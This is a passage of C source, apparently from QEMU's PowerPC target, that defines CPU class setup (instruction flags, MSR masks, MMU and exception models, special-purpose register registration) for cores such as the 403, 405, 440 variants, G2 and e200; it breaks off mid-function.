POWERPC_FAMILY(403)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 403"; pcc->init_proc = init_proc_403; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_PE) | (1ull << MSR_PX) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_REAL; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_PX | POWERPC_FLAG_BUS_CLK; }
static void init_proc_403GCX(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_403(env); gen_spr_403_real(env); gen_spr_403_mmu(env); /* Bus access control */ /* not emulated, as QEMU never does speculative access */ spr_register(env, SPR_40x_SGR, "SGR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0xFFFFFFFF); /* not emulated, as QEMU does not emulate caches */ spr_register(env, SPR_40x_DCWR, "DCWR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_4xx_softmmu(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(8, 12, 16, 20); SET_WDT_PERIOD(16, 20, 24, 28); }
POWERPC_FAMILY(403GCX)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 403 GCX"; pcc->init_proc = init_proc_403GCX; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_40x_TLB | PPC_MEM_TLBIA | PPC_MEM_TLBSYNC | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_PE) | (1ull << MSR_PX) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_4xx_Z; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_PX | POWERPC_FLAG_BUS_CLK; }
static void init_proc_405(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_40x(env); gen_spr_405(env); /* Bus access control */ /* not emulated, as QEMU never does speculative access */ spr_register(env, SPR_40x_SGR, "SGR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0xFFFFFFFF); /* not emulated, as QEMU does not emulate caches */ spr_register(env, SPR_40x_DCWR, "DCWR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_4xx_softmmu(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(8, 12, 16, 20); SET_WDT_PERIOD(16, 20, 24, 28); }
POWERPC_FAMILY(405)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 405"; pcc->init_proc = init_proc_405; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_40x_TLB | PPC_MEM_TLBIA | PPC_MEM_TLBSYNC | PPC_4xx_COMMON | PPC_405_MAC | PPC_40x_EXCP; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_SOFT_4xx; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_405; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; }
static void init_proc_440EP(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_BookE(env, 0x000000000000FFFFULL); gen_spr_440(env); gen_spr_usprgh(env); /* Processor identification */ spr_register(env, SPR_BOOKE_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC1, "DVC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC2, "DVC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_MCSR, "MCSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR0, "MCSRR0", SPR_NOACCESS, SPR_NOACCESS,
&spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR1, "MCSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_CCR1, "CCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_BookE(env); env->dcache_line_size = 32; env->icache_line_size = 32; ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(20, 24, 28, 32); } POWERPC_FAMILY(440EP)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 440 EP"; pcc->init_proc = init_proc_440EP; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_FLOAT | PPC_FLOAT_FRES | PPC_FLOAT_FSEL | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_DCR | PPC_WRTEE | PPC_RFMCI | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } POWERPC_FAMILY(460EX)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 460 EX"; pcc->init_proc = init_proc_440EP; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_FLOAT | PPC_FLOAT_FRES | PPC_FLOAT_FSEL | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_DCR | PPC_DCRX | PPC_WRTEE | PPC_RFMCI | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #if defined(TODO_USER_ONLY) static void init_proc_440GP(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_BookE(env, 0x000000000000FFFFULL); gen_spr_440(env); gen_spr_usprgh(env); /* Processor identification */ spr_register(env, SPR_BOOKE_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC1, "DVC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC2, "DVC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ 
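/*
 * These four fields describe the software-managed TLB to the generic
 * MMU helpers: tlb_type selects the embedded (BookE) entry layout,
 * nb_tlb and nb_ways give the entry count and associativity used by
 * the generic soft-TLB code, and id_tlbs = 0 means one unified TLB is
 * shared by instruction and data accesses rather than split I/D
 * arrays.
 */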
env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_BookE(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* XXX: TODO: allocate internal IRQ controller */ SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(20, 24, 28, 32); } POWERPC_FAMILY(440GP)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 440 GP"; pcc->init_proc = init_proc_440GP; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_DCRX | PPC_WRTEE | PPC_MFAPIDI | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_TLBIVA | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #endif #if 0 static void init_proc_440x4(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_BookE(env, 0x000000000000FFFFULL); gen_spr_440(env); gen_spr_usprgh(env); /* Processor identification */ spr_register(env, SPR_BOOKE_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC1, "DVC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC2, "DVC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_BookE(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* XXX: TODO: allocate internal IRQ controller */ SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(20, 24, 28, 32); } POWERPC_FAMILY(440x4)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 440x4"; pcc->init_proc = init_proc_440x4; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #endif static void init_proc_440x5(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_BookE(env, 0x000000000000FFFFULL); gen_spr_440(env); gen_spr_usprgh(env); /* Processor identification */ spr_register(env, SPR_BOOKE_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, 
&spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC1, "DVC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DVC2, "DVC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_MCSR, "MCSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR0, "MCSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR1, "MCSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_CCR1, "CCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_BookE(env); env->dcache_line_size = 32; env->icache_line_size = 32; ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(20, 24, 28, 32); } POWERPC_FAMILY(440x5)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 440x5"; pcc->init_proc = init_proc_440x5; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_WRTEE | PPC_RFMCI | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } POWERPC_FAMILY(440x5wDFPU)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 440x5 with double precision FPU"; pcc->init_proc = init_proc_440x5; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_FLOAT | PPC_FLOAT_FSQRT | PPC_FLOAT_STFIWX | PPC_DCR | PPC_WRTEE | PPC_RFMCI | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_MFTB | PPC_BOOKE | PPC_4xx_COMMON | PPC_405_MAC | PPC_440_SPEC; pcc->insns_flags2 = PPC2_FP_CVT_S64; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DWE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #if defined(TODO_USER_ONLY) static void init_proc_MPC5xx(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_5xx_8xx(env); gen_spr_5xx(env); init_excp_MPC5xx(env); env->dcache_line_size = 32; 
    env->icache_line_size = 32;
    /* XXX: TODO: allocate internal IRQ controller */
}

POWERPC_FAMILY(MPC5xx)(CPUClass *oc, void *data)
{
    PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc);

    // dc->desc = "Freescale 5xx cores (aka RCPU)";
    pcc->init_proc = init_proc_MPC5xx;
    pcc->check_pow = check_pow_none;
    pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MEM_EIEIO |
                       PPC_MEM_SYNC | PPC_CACHE_ICBI | PPC_FLOAT |
                       PPC_FLOAT_STFIWX | PPC_MFTB;
    pcc->msr_mask = (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) |
                    (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) |
                    (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) |
                    (1ull << MSR_EP) | (1ull << MSR_RI) | (1ull << MSR_LE);
    pcc->mmu_model = POWERPC_MMU_REAL;
    pcc->excp_model = POWERPC_EXCP_603;
    pcc->bus_model = PPC_FLAGS_INPUT_RCPU;
    pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK;
}
#endif

#if defined(TODO_USER_ONLY)
static void init_proc_MPC8xx(CPUPPCState *env)
{
    /* Time base */
    gen_tbl(env);
    gen_spr_5xx_8xx(env);
    gen_spr_8xx(env);
    init_excp_MPC8xx(env);
    env->dcache_line_size = 32;
    env->icache_line_size = 32;
    /* XXX: TODO: allocate internal IRQ controller */
}

POWERPC_FAMILY(MPC8xx)(CPUClass *oc, void *data)
{
    PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc);

    // dc->desc = "Freescale 8xx cores (aka PowerQUICC)";
    pcc->init_proc = init_proc_MPC8xx;
    pcc->check_pow = check_pow_none;
    pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MEM_EIEIO |
                       PPC_MEM_SYNC | PPC_CACHE_ICBI | PPC_MFTB;
    pcc->msr_mask = (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) |
                    (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_SE) |
                    (1ull << MSR_DE) | (1ull << MSR_EP) | (1ull << MSR_IR) |
                    (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE);
    pcc->mmu_model = POWERPC_MMU_MPC8xx;
    pcc->excp_model = POWERPC_EXCP_603;
    pcc->bus_model = PPC_FLAGS_INPUT_RCPU;
    pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK;
}
#endif

/* Freescale 82xx cores (aka PowerQUICC-II) */

static void init_proc_G2(CPUPPCState *env)
{
    gen_spr_ne_601(env);
    gen_spr_sdr1(env);
    gen_spr_G2_755(env);
    gen_spr_G2(env);
    /* Time base */
    gen_tbl(env);
    /* External access control */
    /* XXX : not implemented */
    spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic, 0x00000000);
    /* Hardware implementation register */
    /* XXX : not implemented */
    spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic, 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic, 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic, 0x00000000);
    /* Memory management */
    gen_low_BATs(env);
    gen_high_BATs(env);
    gen_6xx_7xx_soft_tlb(env, 64, 2);
    init_excp_G2(env);
    env->dcache_line_size = 32;
    env->icache_line_size = 32;
    /* Allocate hardware IRQ controller */
    ppc6xx_irq_init(env_archcpu(env));
}

POWERPC_FAMILY(G2)(CPUClass *oc, void *data)
{
    PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc);

    // dc->desc = "PowerPC G2";
    pcc->init_proc = init_proc_G2;
    pcc->check_pow = check_pow_hid0;
    pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT |
                       PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_STFIWX |
                       PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ |
                       PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE |
                       PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT |
                       PPC_EXTERN;
    pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_TGPR) |
                    (1ull << MSR_EE) | (1ull << MSR_PR) |
(1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_AL) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_G2; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void init_proc_G2LE(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_G2_755(env); gen_spr_G2(env); /* Time base */ gen_tbl(env); /* External access control */ /* XXX : not implemented */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation register */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_G2(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(G2LE)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC G2LE"; pcc->init_proc = init_proc_G2LE; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_AL) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_G2; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void init_proc_e200(CPUPPCState *env) { /* Time base */ gen_tbl(env); gen_spr_BookE(env, 0x000000070000FFFFULL); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_SPEFSCR, "SPEFSCR", &spr_read_spefscr, &spr_write_spefscr, &spr_read_spefscr, &spr_write_spefscr, 0x00000000); /* Memory management */ gen_spr_BookE206(env, 0x0000005D, NULL, 0); /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_ALTCTXCR, "ALTCTXCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_BUCSR, "BUCSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_CTXCR, "CTXCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, 
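                 /* (spr_register() convention used throughout this file:
                  *  user-mode read/write callbacks first, then the
                  *  supervisor-mode pair, then the SPR's reset value;
                  *  SPR_NOACCESS rejects the access at that privilege
                  *  level.) */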
